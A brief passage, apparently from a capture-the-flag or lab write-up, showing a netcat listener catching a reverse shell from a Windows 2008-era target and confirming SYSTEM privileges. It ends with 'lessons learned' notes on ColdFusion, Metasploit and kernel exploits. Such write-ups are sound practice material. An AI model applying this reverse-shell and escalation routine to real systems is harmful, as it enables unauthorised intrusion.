listening on [any] 5555 ...
connect to [10.10.14.6] from (UNKNOWN) [10.129.94.47] 49925
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\temp>whoami
whoami
nt authority\system
Lessons learned: ColdFusion page > look for a Metasploit module > run the exploit suggester.
Win 2008 or 2007 > try a kernel exploit first.